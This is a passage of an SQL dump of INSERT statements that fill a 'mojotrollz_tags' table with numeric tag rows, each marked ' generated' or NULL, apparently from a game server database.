INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8554, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8555, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8556, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8557, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8558, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8559, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8559, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8560, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8560, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8561, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8561, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8562, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8562, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8572, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8573, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8574, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8576, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8577, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8579, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8579, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8584, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8585, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8586, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8587, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8592, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8592, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8593, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8593, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8594, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8594, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8595, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8595, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8596, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8596, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8597, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8599, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8602, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8602, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8603, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8603, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8606, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8619, 4, 1, 230, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8619, 4, 2, 1584, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8620, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8621, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8621, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8622, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8622, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8623, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8623, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8624, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8624, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8625, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8625, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8626, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8626, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8627, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8627, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8628, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8628, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8629, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8629, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8630, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8630, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8631, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8631, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8632, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8632, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8633, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8633, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8634, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8634, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8635, 4, 1, 349, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8635, 4, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8636, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8637, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8637, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8638, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8638, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8639, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8639, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8640, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8640, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8641, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8641, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8642, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8644, 4, 1, 229, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8644, 4, 2, 1583, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8646, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8647, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8648, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8649, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8650, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8652, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8653, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8654, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8655, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8655, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8656, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8656, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8657, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8657, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8658, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8658, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8659, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8659, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8660, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8660, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8661, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8661, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8662, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8662, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8663, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8663, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8664, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8664, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8665, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8665, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8666, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8666, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8667, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8667, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8668, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8668, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8669, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8669, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8670, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8671, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8672, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8673, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8674, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8675, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8676, 4, 1, 209, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8676, 4, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8677, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8678, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8679, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8680, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8681, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8682, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8683, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8684, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8685, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8686, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8688, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8689, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8690, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8691, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8692, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8693, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8694, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8695, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8696, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8697, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8698, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8699, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8700, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8701, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8702, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8703, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8704, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8705, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8706, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8707, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8708, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8709, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8710, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8711, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8712, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8713, 4, 1, 109, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8713, 4, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8714, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8715, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8716, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8717, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8718, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8719, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8720, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8721, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8722, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8723, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8724, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8725, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8726, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8728, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8729, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8730, 4, 1, 469, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8730, 4, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8731, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8732, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8734, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8735, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8736, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8741, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8742, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8745, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8746, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8747, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8748, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8749, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8750, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8751, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8752, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8753, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8754, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8755, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8756, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8757, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8758, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8759, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8760, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8762, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8763, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8764, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8765, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8766, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8789, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8789, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8790, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8790, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8796, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8798, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8799, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8800, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8802, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8802, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8811, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8812, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8813, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8814, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8815, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8816, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8817, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8818, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8819, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8820, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8821, 4, 1, 1, ' generated'); 